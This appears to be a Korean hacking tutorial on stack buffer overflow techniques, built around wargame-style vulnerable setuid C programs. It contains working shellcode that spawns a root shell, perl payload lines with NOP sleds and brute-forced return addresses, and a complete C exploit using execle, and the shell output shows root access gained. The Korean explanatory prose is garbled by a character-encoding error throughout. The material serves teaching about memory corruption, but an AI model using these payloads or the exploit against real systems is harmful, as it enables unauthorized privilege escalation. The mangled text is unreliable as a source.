http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=212 [º¹»ç]
/*
homepage: http://beist.org
e-mail: beist@hanmail.net
msn: beist@hotmail.com
beist¿Í °ü·ÃµÈ »çÀÌÆ® :
http://wowhacker.com (wowcode at wowhacker team)
http://hackerschool.org (very good hacking portal site)
*/
- ¸ñÂ÷ -
0. ¼Ò°³
1. big buffer overflow
2. small buffer overflow
3. ¿©·¯°¡Áö ±â¹ýµé
3-1. egghunter
3-2. argv[0] strcpy
3-3. strcat
4. env overflow
5. ¶ó¸¶±×¶ó ¹öÀü #1
6. ¶ó¸¶±×¶ó ¹öÀü #2
7. frame pointer
8. integer overflow
9. ±âŸ overflow ¹æ¹ý (±ÛÀ» ¸¶Ä¡¸é¼)
Overflow °ø°Ý ±â¹ýµé¿¡ ´ëÇØ..
0. ¼Ò°³
¾È³çÇϼ¼¿ä? beist ÀÔ´Ï´Ù.
¿À´ÃÀº Overflow ¿¡ ´ëÇؼ ¾Ë¾Æº¸·Á ÇÕ´Ï´Ù. ÀÌ ¹®¼¿¡¼´Â Stack Overflow
±â¹ý¿¡ ´ëÇؼ ¼³¸íÇÒ °ÍÀÔ´Ï´Ù. ¹®¼ÀÇ ¸ñÀûÀº Stack Overflow ÀÇ ¿¹Àü
¹æ½Äµé°ú ÇöÀç ±â¹ýµé¿¡ ´ëÇؼ ¹®¼·Î Á¤¸®Çϴµ¥ ÀÖ½À´Ï´Ù.
ÀÌ °÷¿¡¼±, Overflow °ø°Ý ±â¹ý¿¡ ÇÊ¿äÇÑ ºÎ°¡ÀûÀÎ Áö½Ä¿¡ ´ëÇؼ ÀÚ¼¼È÷
´Ù·çÁö ¾ÊÀ» °ÍÀÔ´Ï´Ù. ¿¹¸¦ µç´Ù¸é, ShellCode Á¦ÀÛ ±â¹ý, Heap, Stack,
Data ¿µ¿ª µî ¸Þ¸ð¸® ±¸Á¶¿¡ ´ëÇؼÀÇ ¼³¸í°°Àº °Íµé ¸»ÀÔ´Ï´Ù.
ºÎ°¡ÀûÀÎ Áö½Ä±îÁö ´Ù·ç±â¿¡´Â ¹®¼°¡ ³Ê¹« ¹æ´ëÇØÁö°í, ±× ÁÖÁ¦µé¿¡ ´ëÇؼ
µû·Î Á¤¸®µÇ¾î ÀÖ´Â ¹®¼µéµµ ¸¹±â ¶§¹®ÀÔ´Ï´Ù. ±×·¸±â ¶§¹®¿¡ ÀÌ ¹®¼¸¦ Àаí
ÀÌÇØÇϱâ À§Çؼ´Â Overflow °ø°Ý ±â¹ý¿¡ ´ëÇÑ Áö½ÄÀÌ ¾î´À Á¤µµ °®Ãß¾îÁ®
ÀÖ¾î¾ß ÇÕ´Ï´Ù.
Overflow °ø°Ý ±â¹ýÀÌ ÀÎÅͳݿ¡ ¼Ò°³µÈÁöµµ ¿À·£ ½Ã°£ÀÌ Áö³µ½À´Ï´Ù. ±×¿¡
µû¶ó °ø°Ý ±â¹ýµéµµ ´Ù¾çÇÏ°Ô ³ª¿À°Ô µÇ¾ú´Âµ¥, ½¬¿î ÀÌÇظ¦ À§Çؼ °¢
±â¹ýµéÀ» ¼³¸íÇÒ ¶§ Wargame ¹®Á¦¸¦ ¸¸µé¾î¼ ¼³¸íÇÏ°Ú½À´Ï´Ù. ÀÌ ¹®¼¿¡¼´Â
°¢ ¿µ¿ª¿¡ ¹«¾ùÀÌ µé¾î°¡ÀÖ´ÂÁö dump ¸¦ Çغ¸Áö ¾ÊÀ» °ÍÀÔ´Ï´Ù. ÀÌ·¯ÇÑ ÀÚ¼¼ÇÑ
»çÇ×Àº Á÷Á¢ Çغ¸½Ã°í, ¿©±â¼´Â ¹®Á¦¸¦ Ǫ´Â °³³äÀûÀÎ ¹æ¹ý Á¤µµ¸¸ ¼³¸í
ÇÏ°Ú½À´Ï´Ù.
¿©±â¼ ¼³¸íÇÏ´Â ±â¹ýµéÀÇ ÀϺδ ¸®¸ðÆ®¿¡¼µµ ±×´ë·Î Àû¿ëµÇÁö¸¸, ¼³¸íÀ»
ÆíÇÏ°Ô Çϱâ À§ÇØ local ȯ°æÇÏ¿¡¼ Å×½ºÆ®ÇÏ¿´½À´Ï´Ù.
1. ±âº»ÀûÀÎ Stack Overflow ( big buffer )
/* 1.c */
int main(int argc, char *argv[])
{
char buf[400];
if(argc==2)
strcpy(buf, argv[1]);
}
strcpy() ¿¡¼ argv[1] À» buf ¿¡ copy Çϴµ¥, À̶§ °æ°è °Ë»ç¸¦ ÇÏÁö ¾Ê¾Æ¼
overflow °¡ ÀϾ°Ô µË´Ï´Ù.
°ø°ÝÀÇ ±¸¼ºµµ¸¦ ¾Ë¾Æº¸°Ú½À´Ï´Ù. ¸Þ¸ð¸® ±¸Á¶´Â buf - sfp - ret °¡ µÉ °ÍÀÌ°í,
argv[1] ·Î buf ¿¡ copy ÇÕ´Ï´Ù.
°ø°ÝÀÇ ¼º°øµµ¸¦ ³ôÀ̱â À§ÇØ NOP (no operation) Äڵ带 ³õ°í, ±× µÚ¿¡ ½©ÄÚµå,
NOP, Return Address ÁÖ¼Ò¸¦ ³Ö½À´Ï´Ù. °¢°¢ÀÇ »çÀÌÁîÀÔ´Ï´Ù.
NOP - 352
SHELLCODE - 32
GARBAGE - 16
RETURN ADDRESS - 24
char shellcode[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
[root@hacking doc]# gcc -o 1 1.c
[root@hacking doc]# chmod 6755 1
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf4\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf5\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf6\xff\xbf"x6'`
Illegal instruction
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf7\xff\xbf"x6'`
sh-2.05b#
0xbffff724 ¿¡¼ ½©ÀÌ ¶³¾îÁ³½À´Ï´Ù. Àú ºÎºÐÀº buf ¿µ¿ªÁßÀÇ NOP ÄÚµåÀÏ °ÍÀÔ´Ï´Ù.
ÀÚ¼¼ÇÑ ¿µ¿ª¿¡ ´ëÇؼ´Â buf ¸¦ Á÷Á¢ ´ýÇÁÇغ¸½Ã±â ¹Ù¶ø´Ï´Ù.
2. ±âº»ÀûÀÎ stack overflow (small buffer)
/* 2.c */
int main(int argc, char *argv[])
{
char buf[4];
if(argc==2)
strcpy(buf, argv[1]);
}
1.c ¿Í °°Àº ¼Ò½ºÀÌÁö¸¸ buf ÀÇ Å©±â°¡ ´Ù¸¨´Ï´Ù. 1.c ¿¡¼´Â buf ÀÇ Å©±â°¡ 400 ¹ÙÀÌÆ®
¶ó¼, NOP, SHELLCODE µîÀ» ³Ö±â¿¡ ÃæºÐÇßÁö¸¸, 2.c ¿¡¼´Â buf ÀÇ Å©±â°¡ 4 ¹ÙÀÌÆ®¹Û¿¡
µÇÁö ¾ÊÀ¸¹Ç·Î NOP À̳ª SHELLCODE µîÀ» ³ÖÀ» ¼ö°¡ ¾ø½À´Ï´Ù.
ÀÌ·² ¶§´Â ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇÏ¿© °ø°ÝÀÌ °¡´ÉÇÕ´Ï´Ù. ȯ°æ º¯¼ö´Â stack ¿¡ Á¸ÀçÇÏ°í
Àִµ¥, ÀÓÀÇÀÇ È¯°æ º¯¼ö Çϳª¸¦ Àâ°í, ±× ¾È¿¡ SHELLCODE ¸¦ ³ÖÀº ÈÄ, 2.c ¸¦ °ø°Ý½Ã¿¡
return address ·Î ȯ°æ º¯¼öÀÇ ÁÖ¼Ò¸¦ ³ÖÀ¸¸é ½©À» ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù.
[root@hacking doc]# gcc -o 2 2.c
[root@hacking doc]# chmod 6755 2
BEIST ¶ó´Â ȯ°æ º¯¼ö¿¡ 400 ¹ÙÀÌÆ®ÀÇ NOP À» ³Ö°í, ±× µÚ¿¡ SHELLCODE ¸¦ ³Ö°Ú½À´Ï´Ù.
[beist@hacking doc]$ BEIST="`perl -e 'print \"\x90\"x400, \"\x31\xc0\x89\xc3\xb0
\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\x8d\x42\x0b\xcd\x80\"'`"
[beist@hacking doc]$ export BEIST
°ø°ÝÀ» ½ÃµµÇغ¸°Ú½À´Ï´Ù.
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf8\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf9\xff\xbf"x3'`
Illegal instruction
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfa\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfb\xff\xbf"x3'`
sh-2.05b# exit
0xbffffb24 ¿¡¼ ½©À» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. BEIST ȯ°æ º¯¼ö°¡ Àú À§Ä¡Âë¿¡ Á¸ÀçÇÒ
°ÍÀÌ°í, ¾Æ¸¶ ¿ì¸®°¡ Á¢±ÙÇÑ °÷Àº BEIST ȯ°æ º¯¼ö¿¡ ´ã±ä NOP ¿µ¿ªÀÏ °ÍÀÔ´Ï´Ù.
3. ¿©·¯°¡Áö overflow À¯Çüµé
(3) ¿¡¼ ¼³¸íÇÏ´Â ±âº»ÀûÀÎ ¹æ¹ýÀº (1) °ú (2) ¿¡¼ ¼³¸íÇß´ø ³»¿ë°ú ºñ½ÁÇÕ´Ï´Ù.
¿©·¯ °¡Áö »óȲµéÀ» ¿ö°ÔÀÓÀ¸·Î ¸¸µé¾î Ç®ÀÌ ¹æ¹ýÀ» ¼³¸íÇغ¸°Ú½À´Ï´Ù.
1) egghunter
À̹ø¿¡´Â egg hunter°¡ µé¾î°£ Ãë¾à ÇÁ·Î±×·¥À» °ø°ÝÇØ º¸°Ú½À´Ï´Ù. egg hunter´Â
egg shell, Áï ȯ°æ º¯¼ö¸¦ ¾ø¾ÖÁÖ´Â ±â´ÉÀ» ÇÕ´Ï´Ù. ȯ°æ º¯¼ö´Â Àü¿ªÀ¸·Î ¼±¾ð
µÇ¾îÀִµ¥, ÀÌ Àü¿ª ¼±¾ðµÈ environ À» memset() ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© Ãʱâȸ¦
½Ãŵ´Ï´Ù.
±×·¡¼, ȯ°æ º¯¼ö¿¡ SHELLCODE ¸¦ ³Ö°í, Ãë¾àÇÑ ÇÔ¼öÀÇ return address ¸¦ ȯ°æ
º¯¼öÀÇ ÁÖ¼Ò·Î ¹Ù²Ù¾îµµ, egghunter ¿¡ ÀÇÇØ È¯°æ º¯¼ö°¡ ÃʱâȵDZ⠶§¹®¿¡,
ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇÒ ¼ö ¾ø½À´Ï´Ù.
¸¸¾à Ãë¾àÇÑ ÇÁ·Î±×·¥¿¡¼ ÀÔ·ÂÇÒ ¼ö ÀÖ´Â buffer ÀÇ Å©±â°¡ ¿©À¯°¡ ÀÖ´Ù¸é, ±×
buffer ¾È¿¡ SHELLCODE ¸¦ ³Ö¾îµµ µÇ°ÚÁö¸¸ ±×·¸Áö ¸øÇÑ »óȲÀÏ ¶§´Â ȯ°æ º¯¼öµµ,
¹öÆÛµµ ¾Æ´Ñ ¾î¶² ÀÓÀÇÀÇ ¿µ¿ªÀ» ÀÌ¿ëÇÏ¿©¾ß ÇÕ´Ï´Ù. ¿©±â¼´Â ȯ°æ º¯¼ö¿Í ¸¶Âù
°¡Áö·Î ½ºÅÃÀÇ ÀϺÎÀÎ argv ¸¦ ÀÌ¿ëÇÏ¿© ¹®Á¦¸¦ Ç®¾îº¸°Ú½À´Ï´Ù. ¹®Á¦´Â ´ÙÀ½°ú
°°½À´Ï´Ù.
/* 3-1.c */
extern char **environ;
void function(char *str)
{
char buf[4];
strncpy(buf, str, 12);
}
int main(int argc, char *argv[])
{
int egghunter;
for(egghunter=0; environ[egghunter]; egghunter++)
memset(environ[egghunter], 0, strlen(environ[egghunter]));
function(argv[1]);
}
¹®Á¦ ¼³Ä¡¸¦ ÇÏ°í °ø°ÝÀ» Çغ¸°Ú½À´Ï´Ù.
[root@beist doc]# gcc -o 3-1 3-1.c
[root@beist doc]# chmod 6755 3-1
°ø°ÝÀ» ½ÃµµÇÒ ¶§, argv[1] ´Â, ¿ì¸®°¡ µ¹¾Æ°¥ return address ¸¦ °¡¸£ÄÑ¾ß ÇÕ´Ï´Ù.
¿ì¸®ÀÇ SHELLCODE ´Â argv[2] ¿µ¿ª¿¡ ³õÀ» °ÍÀÌ´Ï, argv[1] ´Â argv[2] À» °¡¸£ÄѾß
ÇÕ´Ï´Ù.
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf8\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf9\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfa\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfb\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#
0xbffffb24 ¿¡¼ shell À» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. argv[2] ¿¡´Â NOP Äڵ带 400 ¹ÙÀÌÆ®¸¦
³Ö¾îµÎ¾ú°í, ±× µÚ¿¡ SHELLCODE ¸¦ ³Ö¾ú½À´Ï´Ù.
2) argv[0] strcpy
À̹ø¿¡´Â ¿ø¸®´Â °°Áö¸¸ Á¶±Ý ´Ù¸¥ ¹æ¹ýÀ¸·Î Ç®À̸¦ ÇؾßÇÏ´Â ¹®Á¦ÀÔ´Ï´Ù. ¹Ù·Î argv[0]
ÀÚü¸¦ buffer ¿¡ strcpy() ÇÏ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù. ±âº»ÀûÀÎ overflow ¹®Á¦¿Í ÀüÇô ´Ù¸¦
°ÍÀÌ ¾øÁö¸¸ argv[0] À» ¾î¶»°Ô ¹Ù²Ù´À³Ä°¡ Áß¿äÇÕ´Ï´Ù. argv[0] Àº ÇÁ·Î±×·¥ À̸§À»
¶æÇÕ´Ï´Ù. ÇÏµå ¸µÅ©, ½Éº¼¸¯ ¸µÅ©, exec ÇÔ¼ö±ºµéÀ» ÀÌ¿ëÇÏ¿© argv[0] ¹Ù²Ù±â, µî ¿©·¯
°¡Áö ¹æ¹ýÀ¸·Î argv[0] À» Á¶ÀÛÇÒ ¼ö Àִµ¥, ¿©±â¼´Â °¡Àå °£ÆíÇÑ ¹æ¹ýÀÎ ½Éº¼¸¯
¸µÅ©¸¦ ÀÌ¿ëÇÑ ¹æ¹ýÀ» ¼Ò°³ÇÏ°Ú½À´Ï´Ù.
/* 3-2.c */
int main(int argc, char *argv[])
{
char buf[10];
strcpy(buf,argv[0]);
}
¹®Á¦¸¦ ¼³Ä¡ÇÏ°Ú½À´Ï´Ù.
[root@beist doc]# gcc -o 3-2 3-2.c
[root@beist doc]# chmod 6755 3-2
½Éº¼¸¯ ¸µÅ©¸¦ ÀÌ¿ëÇÏ¿© argv[0] À» ¹Ù²Ù°Ú½À´Ï´Ù. ¿©±â¼´Â, argv[0] ¿¡´Â ´Ü¼øÈ÷
return address ¸¸À» ÁöÁ¤ÇÏ°í, SHELLCODE ´Â, argv[1] ¿¡ ³õ°Ú½À´Ï´Ù. ±×·¯¹Ç·Î
argv[0] Àº argv[1] À» °¡¸£Å°°Ô ÇÏ¸é µÉ °ÍÀÔ´Ï´Ù.
[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xf9\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xf9\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction
[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfa\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfa\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfb\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfb\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#
return address °¡ 0xbffffb24 ¿¡¼ ¶³¾îÁø °ÍÀ¸·Î º¸¾Æ, SHELLCODE °¡ ´ã±ä
argv[1] ÀÌ ±× ¿µ¿ªÀÓÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù. ÇÁ·Î±×·¥À» ½ÇÇà½Ãų ¶§, ¾Õ¿¡ "./" °¡
¾Æ´Ñ ".///" ¸¦ ³Ö¾îÁØ ÀÌÀ¯´Â, ¿öµå ´ÜÀ§¸¦ 4 ¹ÙÀÌÆ®·Î ¸ÂÃçÁÖ±â À§ÇÔÀÔ´Ï´Ù.
3) strcat overflow
strcat ÀÇ overflow µµ ´Ù¸¥ ÀϹÝÀûÀÎ overflow ¿Í Â÷ÀÌÁ¡ÀÌ ¾ø½À´Ï´Ù. ÇÔ¼öÀÇ return
address ¿µ¿ªÀ» µ¤¾î¼ °ø°ÝÇÑ´Ù´Â, °ø°Ý ¹æ¹ýÀº °°½À´Ï´Ù.
3-3.c
void function(char *str)
{
char buf[4]={0};
strcat(buf, str);
}
main(int argc, char *argv[])
{
if(argc == 2)
function(argv[1]);
}
[root@hacking doc]# gcc -o 3-3 3-3.c
[root@hacking doc]# chmod 6755 3-3
ÇöÀç 3-3 ÇÁ·Î±×·¥ÀÇ buffer »óÅ´ ´ÙÀ½°ú °°½À´Ï´Ù.
[ buf ] [ sfp ] [ ret ] [ ±âŸ¿µ¿ª ]
¿©±â¼´Â, ±âŸ¿µ¿ª¿¡ NOP ÄÚµå¿Í ½©Äڵ带 ³Ö°í, ret ¿µ¿ªÀº, ±âŸ ¿µ¿ªÀ» °¡¸£Å°°Ô ÇÏ´Â
¹æ¹ýÀ¸·Î °ø°ÝÀ» Çغ¸°Ú½À´Ï´Ù.
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf5\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf6\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf7\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf8\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05b#
4 ¹ø° °ø°Ý¿¡¼ ½©À» µþ ¼ö ÀÖ¾ú½À´Ï´Ù.
4. env overflow
env overflow ±â¹ýÀº, murat@underunix.org ¶ó´Â ¿Ü±¹ÀÇ ÇØÄ¿¿¡ ÀÇÇؼ ¼Ò°³µÈ ¹Ù°¡
ÀÖ½À´Ï´Ù. ±âÁ¸ÀÇ stack overflow °ø°Ý ±â¹ý°ú´Â Á¶±Ý ´Ù¸¥ ¹æ¹ýÀ¸·Î Á¢±ÙÀ» Çϴµ¥,
±âÁ¸ÀÇ °ø°Ý ±â¹ýµéÀº, ¾î´À Á¤µµÀÇ °ø°Ý ½Ãµµ¸¦ °ÅÃļ ¿ì¸®°¡ ³ÖÀº ½©Äڵ忡 Á¢±ÙÀ»
Çϴµ¥ ºñÇØ, env overflow Àº NOP Äڵ带 ³õ°í, ¿É¼ÂÀ» Âï¾î¸ÂÃß´Â °æ¿ì¿Í´Â ´Ù¸¥
¹æ¹ýÀ¸·Î one shot ¿¡ ¼º°øÀ» ÇÒ ¼ö ÀÖ´Â ÀåÁ¡ÀÌ ÀÖ½À´Ï´Ù.
env overflow ÀÇ °ø°Ý ÇÙ½ÉÀº ´ÙÀ½°ú °°½À´Ï´Ù. ÀÌ ¹æ¹ý¿¡ ´ëÇÑ ´õ ÀÚ¼¼ÇÑ »çÇ×Àº
wowhacker lecture °Ô½ÃÆÇ¿¡ ¿Ã·ÁÁø Buffer overflow Demystified ¶õ ±ÛÀ» Âü°íÇØ
º¸¼¼¿ä.
ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÉ ¶§ ¿ì¸®ÀÇ ½ºÅÃÀº ´ÙÀ½°ú °°½À´Ï´Ù.
0xbfffffff - ½ºÅÃÀÇ top
4 byte - (NULL byte)
strlen(ÇÁ·Î±×·¥À̸§) - program_name ±æÀÌ
1 byte - program_name ÀÇ null ¹ÙÀÌÆ®
strlen(ȯ°æº¯¼ö) - ¸¶Áö¸· ȯ°æ º¯¼ö ¹®ÀÚ¿
±×·¸´Ù¸é, envp ÀÇ À§Ä¡´Â ´ÙÀ½°ú °°ÀÌ µÉ °ÍÀÔ´Ï´Ù.
envp = 0xbffffffa - strlen(program_name) - strlen(envp)
À§ÀÇ °è»ê´ë·Î¶ó¸é, envp ¿¡ shellcode ¸¦ ³õ°í, envp °¡ ½ÃÀÛµÉ À§Ä¡ÀÇ ÁÖ¼Ò·Î Ãë¾àÇÑ
ÇÁ·Î±×·¥ÀÇ buffer ¸¦ µ¤¾î¾²°í, ±×´ë·Î return address ¸¦ µ¤¾î¾º¿ì¸é ¿ì¸®´Â ½©À»
¾òÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù.
±×·±µ¥ °ø°Ý ½Ã¿¡, ´Ù¸¥ ȯ°æ º¯¼öµéÀÌ Á¸ÀçÇÑ´Ù¸é ȯ°æ º¯¼ö¸¦ °è»êÇϱⰡ Á¶±Ý
ºÒÆíÇØÁö¹Ç·Î, C ÇÁ·Î±×·¥À» ÀÛ¼ºÇÏ¿© ´Ù¸¥ ȯ°æ º¯¼ö´Â ¸ðµÎ Áö¿î ÈÄ, °ø°ÝÀ» ½Ãµµ
Çغ¸°Ú½À´Ï´Ù.
Ãë¾àÁ¡À» °¡Áø wargame ¼Ò½º´Â ´ÙÀ½°ú °°½À´Ï´Ù.
/bof/doc/4.c
void function(char *str)
{
char buf[4];
strncpy(buf, str, 20);
}
int main(int argc, char *argv[])
{
if(argc == 2)
function(argv[1]);
}
[root@hacking doc]# gcc -o 4 4.c
[root@hacking doc]# chmod 6755 4
Ãë¾àÇÑ ¼Ò½ºÀÇ buffer ´Â ´ÙÀ½°ú °°½À´Ï´Ù.
[ buf ] [ sfp ] [ ret ]
¿ì¸®´Â ret ÀÇ ÁÖ¼Ò¸¦ ½©Äڵ尡 ³õÀÎ envp ÀÇ ÁÖ¼Ò·Î °¡¸£Å°°Ô ÇÒ °ÍÀÔ´Ï´Ù. ±×·¯·Á¸é
buf, sfp, ret ¸¦ µ¤À» ¼ö ÀÖ´Â Å©±âÀÎ 12 ¹ÙÀÌÆ®¸¦ argv[1] ·Î ÁöÁ¤ÇÏ°í ½ÇÇàÇؾß
ÇÕ´Ï´Ù.
´ÙÀ½Àº °ø°Ý ¼Ò½ºÀÔ´Ï´Ù.
/bof/doc/4-attack.c
#include <stdio.h>
char sc[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x6
2\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
main()
{
char *env[3] = {sc, NULL};
char buf[12];
int *a=(int *)(buf);
int ret=0xbffffffa - strlen(sc) - strlen("/bof/doc/4");
*a++ = ret;
*a++ = ret;
*a++ = ret;
execle("/bof/doc/4", "4", buf, NULL, env);
}
À§ÀÇ °æ¿ì¿¡ ret ´Â 0xbfffffd0 À¸·Î °è»êµÉ °ÍÀÌ°í, buf ´Â 0xbfffffd0 À¸·Î 12 ¹ÙÀÌÆ®
ÀÌ»óÀ» ÀÌ·ç¾îÁøÈÄ, execle() ÇÔ¼ö·Î ÀÎÇØ buf °¡ argv[1] ·Î µé¾î°¡°Ô µË´Ï´Ù. ±×·¸´Ù¸é
/bof/doc/4 ÀÇ return address ´Â 0xbfffffd0 ÀÌ µÉ °ÍÀÌ°í, 0xbfffffd0 Àº ½©Äڵ尡
³õÀÎ ÁÖ¼ÒÀ̹ǷÎ, ¿ì¸®´Â ½©À» ¾òÀ» ¼ö ÀÖ½À´Ï´Ù.
[beist@hacking doc]$ gcc -o 4-attack 4-attack.c
[beist@hacking doc]$ ./4-attack
sh-2.05b# id
uid=0(root) gid=500(beist) groups=500(beist)
¼º°øÀûÀ¸·Î root shell À» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. env overflow ¹æ½ÄÀº, ´Ü Çѹø¿¡
root shell À» ȹµæÇÒ ¼ö ÀÖ´Ù´Â ÀåÁ¡ÀÌ ÀÖÁö¸¸, ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇϹǷΠlocal ¿¡¼¸¸
ÀÌ¿ëÇÒ ¼ö ÀÖ´Ù´Â ´ÜÁ¡ÀÌ ÀÖ½À´Ï´Ù. ¶ÇÇÑ, ¾îÂ÷ÇÇ È¯°æ º¯¼ö¸¦ ÀÌ¿ëÇÒ ¼ö ÀÖ´Ù¸é,
±»ÀÌ env overflow ¸¦ ÀÌ¿ëÇÏÁö ¾Ê´õ¶óµµ, ´õ ÆíÇÑ ¹æ¹ýÀÌ ¸¹À¸¹Ç·Î ÀÌ ±â¹ýÀº
Å« ¸Þ¸®Æ®°¡ ¾ø´Ù°í °³ÀÎÀûÀ¸·Î »ý°¢ÇÕ´Ï´Ù. ±×·¯³ª, ÀÌ·¯ÇÑ °ø°Ý ¹æ¹ýµµ ÀÖ´Ù´Â °ÍÀ» ¾Ë
¼ö ÀÖ°í, ÀÌ ±â¹ýÀ» ÀÀ¿ëÇÏ¿© ´õ ÁÁÀº ±â¹ýµµ ³ª¿Ã ¼ö ÀÖÀ»°Å¶ó »ý°¢µË´Ï´Ù.
5. ¶ó¸¶±×¶ó ¹öÀü #1
